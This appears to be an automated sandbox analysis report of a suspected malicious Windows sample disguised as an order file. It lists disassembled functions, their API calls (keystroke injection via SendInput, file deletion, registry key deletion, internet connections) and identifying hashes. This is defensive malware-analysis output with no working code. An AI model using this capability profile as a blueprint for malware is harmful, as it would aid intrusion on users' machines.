GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00463BFB

Strings

advapi32.dll, xrefs: 00463BE4
RegDeleteKeyExW, xrefs: 00463BF5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 5b6f3cb3bccc9e7ad1296aba881979fd5880bfc194b81384b0908bc43ef80c13
Instruction ID: 306718a7605881953b728740fc335e0e7c794a36cff5bcff0d6617268cc744b1
Opcode Fuzzy Hash: 5b6f3cb3bccc9e7ad1296aba881979fd5880bfc194b81384b0908bc43ef80c13
Instruction Fuzzy Hash: 56D05E718007529AC7205FA0A808647BBA4AF15715B20482FE445A2290F7B8C4808B28

Function 0045ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0045ECBE,?,0045EBBB), ref: 0045ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0045ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 0045ECE2
kernel32.dll, xrefs: 0045ECD1

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
Instruction ID: dcea914721d27dac4ff341c8df08104a786117995b40904736e34123f29db048
Opcode Fuzzy Hash: 35ebdd4e20c1b2afadae7e33a46359195925d094769fe02789d2b76876044ece
Instruction Fuzzy Hash: A6D0A730800723AFCB255F62E84C74777E4AF00701B10883FFC56D2292DBB8C8849B28

Function 00439B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bd9d219209151a27035d08ca3443175f762ac00b484f3d985340d045646e85
Instruction ID: 154cca1ea6a2c2468ec1b562650135d9b531fe59f58d0919810d36f21a6d80cc
Opcode Fuzzy Hash: d6bd9d219209151a27035d08ca3443175f762ac00b484f3d985340d045646e85
Instruction Fuzzy Hash: A1C19C75A0021AEFCB04DF94C885AAEB7B4FF48700F10559AE802EB391D7B4EE41DB94

Function 0045AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0045AAB4
CoUninitialize.OLE32 ref: 0045AABF

Part of subcall function 00440213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0044027B

VariantInit.OLEAUT32(?), ref: 0045AACA
VariantClear.OLEAUT32(?), ref: 0045AD9D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
Instruction ID: 5d8e7bca6c7e322d321c672a29ad7db6d4310834907c2f740fef39762054d400
Opcode Fuzzy Hash: 1a29866c399fedbe12860212a8b396e277a36960e8e900f3f97332d45f85d950
Instruction Fuzzy Hash: ABA17C356047019FC701EF25C481B1AB7E5BF48315F04855EFA969B3A2CB38ED59CB8A

Function 004391CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004391DD
SysAllocString.OLEAUT32(?), ref: 00439286
VariantCopy.OLEAUT32 ref: 004392B5
VariantClear.OLEAUT32(?), ref: 004392DC

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
Instruction ID: ca1cb1d64e1576214c9d43b4a1f36021c070d9c51f8d913170cfb391135d6413
Opcode Fuzzy Hash: 16c3d841523b4243f8792349291879d6362bb9c8da590431bfab57a2264760b8
Instruction Fuzzy Hash: E851A570A443069BDB24AF66D49166EB3E5EF4C314F20A82FE946D72D1DBBC9C81870D

Function 0042365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 004236B7
_memcpy_s.LIBCMT ref: 00423729
__filbuf.LIBCMT ref: 004237AA
_memset.LIBCMT ref: 004237EE

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 2ebd63b5f1109b17f0c2738a0f9f126dfcc81151958d9025ba2ca9ad80a75854
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: F351E8B0B00225ABCF249F69A88455F77B5AF40325F64862FF825963D0D77C9F51CB48

Function 0046C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00CEBA10,?), ref: 0046C544
ScreenToClient.USER32(?,00000002), ref: 0046C574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0046C5DA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7d1b4b7bdc677af573c2dab3084f5755a7e1b68ebad285d06f0eaffb91a202c0
Instruction ID: 87e5a9bfdfff9c845bf647487e866e9cced1a94fbcbcc4f7d8d1e25b4db0f31c
Opcode Fuzzy Hash: 7d1b4b7bdc677af573c2dab3084f5755a7e1b68ebad285d06f0eaffb91a202c0
Instruction Fuzzy Hash: D6515E75A00214AFCF10DF68C8C0ABE77B5EB55324F10866AF89597291E734ED41CB99

Function 0043C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0043C462
__itow.LIBCMT ref: 0043C49C

Part of subcall function 0043C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0043C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0043C505
__itow.LIBCMT ref: 0043C55A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
Instruction ID: 800f785b87ce5464c2f688b8ea43766e1c02cbf4e719b26cad73e40aff914bb9
Opcode Fuzzy Hash: ea73ba838f9d0f228c5a1bfd97b9c854882146e6820324a6510eb2afa5c9a282
Instruction Fuzzy Hash: 4041B571A00218BBDF21DF55C892BEE7BB5AF58704F00102EF905B72C1DB789A458BA9

Function 0044390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00443966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00443982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004439EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00443A4D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f2b8e1591dd9a60e8aae886809946efe615b27c9a68ab2e515ca60f655594db4
Instruction ID: 469bf99c801f96624eea77c586d463107e8b0cfafe3e1a68cffd4768a2f07c69
Opcode Fuzzy Hash: f2b8e1591dd9a60e8aae886809946efe615b27c9a68ab2e515ca60f655594db4
Instruction Fuzzy Hash: A74119B0E442486AFF208F6588067FEBBB59B45712F04015BF4C1A22C1C7BC9E85D76D

Function 0044E697 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0044E742
GetLastError.KERNEL32(?,00000000), ref: 0044E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0044E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0044E7B9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 8364812aead40f8a1629cbdfd4868c0e13602acefdd87b14c443068747c84df5
Instruction ID: 169a77b833e8be36c6b928b7e9d72f249fe410762e7ee17e6eb70d30ce0a0b3c
Opcode Fuzzy Hash: 8364812aead40f8a1629cbdfd4868c0e13602acefdd87b14c443068747c84df5
Instruction Fuzzy Hash: 6F412C35600610DFCF11EF26C54495DBBE1BF59724B09849AED46AB3A2CB78EC40CB89

Function 0046B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0046B5D1

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 0c7fa8fd129423bdbf411d7f830480a4d3009da2093df9d332613f0693b94cc5
Instruction ID: c86e180ac39fdd8a69f0b1340c4036a34fcc01a06aab4df10420dcd6b6513ddd
Opcode Fuzzy Hash: 0c7fa8fd129423bdbf411d7f830480a4d3009da2093df9d332613f0693b94cc5
Instruction Fuzzy Hash: 3531D034601208BBEB208A19CC84FEA3765EB06354F544517FA12D62F1F738A9C08BDF

Function 0046D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0046D807
GetWindowRect.USER32(?,?), ref: 0046D87D
PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D
MessageBeep.USER32(00000000), ref: 0046D8FE

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
Instruction ID: 5fa1f60125daaa5e84eea42d34aebc29e8453dd218e4da573cb7e242a531e712
Opcode Fuzzy Hash: 82a3fc2e56d261d0b5de71e479c17d3acb425b3479098c654887e2f7ec5f10ea
Instruction Fuzzy Hash: EE418C70F00218DFCB11EF59C888F697BB5FB45314F1881AAE4249B261E334E945CB4A

Function 00443A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00443AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00443AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00443B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00443B92

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 67c1f1b01dbe3aa5a2a0f83c386fecebafb3acbe32045af1a30874eb09b5793c
Instruction ID: 2f98bc7394ad28ff649f17632b92abe90ebe01e556a85012e6bb176e73858dbf
Opcode Fuzzy Hash: 67c1f1b01dbe3aa5a2a0f83c386fecebafb3acbe32045af1a30874eb09b5793c
Instruction Fuzzy Hash: 12311230A00298AEFB218F648819BBEBBA5DB45716F04011BE481922D2C77CAA45D76A

Function 00434004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00434038
__isleadbyte_l.LIBCMT ref: 00434066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00434094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004340CA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
Instruction ID: 18c0360fd1569c977bfde1c2717b0e17dfe99921f0502833c073a699be0c4c70
Opcode Fuzzy Hash: 37ab115874f95a8e4dee5db45d7759275a89c235a85e03303c59eaa76c12a330
Instruction Fuzzy Hash: 5531D230700216AFDB259F35C844BEB7BB5BF89320F15542AE661872E0E735E891DB98

Function 00467CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00467CB9

Part of subcall function 00445F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445F6F
Part of subcall function 00445F55: GetCurrentThreadId.KERNEL32 ref: 00445F76
Part of subcall function 00445F55: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00445F7D

GetCaretPos.USER32(?), ref: 00467CCA
ClientToScreen.USER32(00000000,?), ref: 00467D03
GetForegroundWindow.USER32 ref: 00467D09

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 475eef5d6a0f7350404378f52132966eac9dc0902e039215e27cd1f42a9e50d2
Instruction ID: 4265c9a58fc21a01463dbc443cf0bcd3287e19691df341119bed6f6131297230
Opcode Fuzzy Hash: 475eef5d6a0f7350404378f52132966eac9dc0902e039215e27cd1f42a9e50d2
Instruction Fuzzy Hash: 01314171D00108AFDB00EFAACD819EFBBFDEF58314B10846BE815E3211E6349E458BA5

Function 0046F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetCursorPos.USER32(?), ref: 0046F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0047E4C0,?,?,?,?,?), ref: 0046F226
GetCursorPos.USER32(?), ref: 0046F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0047E4C0,?,?,?), ref: 0046F2A6

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
Instruction ID: 421acbc8388f5fa8e11c8d5781fd18043b8c951ec840c19c7752c1421d3c3654
Opcode Fuzzy Hash: c9fa625b601cbf756392a4f299952a3100370d958edd679e47e359abe6fdd125
Instruction Fuzzy Hash: 0521F238601018BFCB158F95E868EEF7BB5EF0A310F0440AAF945472A2E3399950DF95

Function 0045431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00454358

Part of subcall function 004543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00454401
Part of subcall function 004543E2: InternetCloseHandle.WININET(00000000), ref: 0045449E

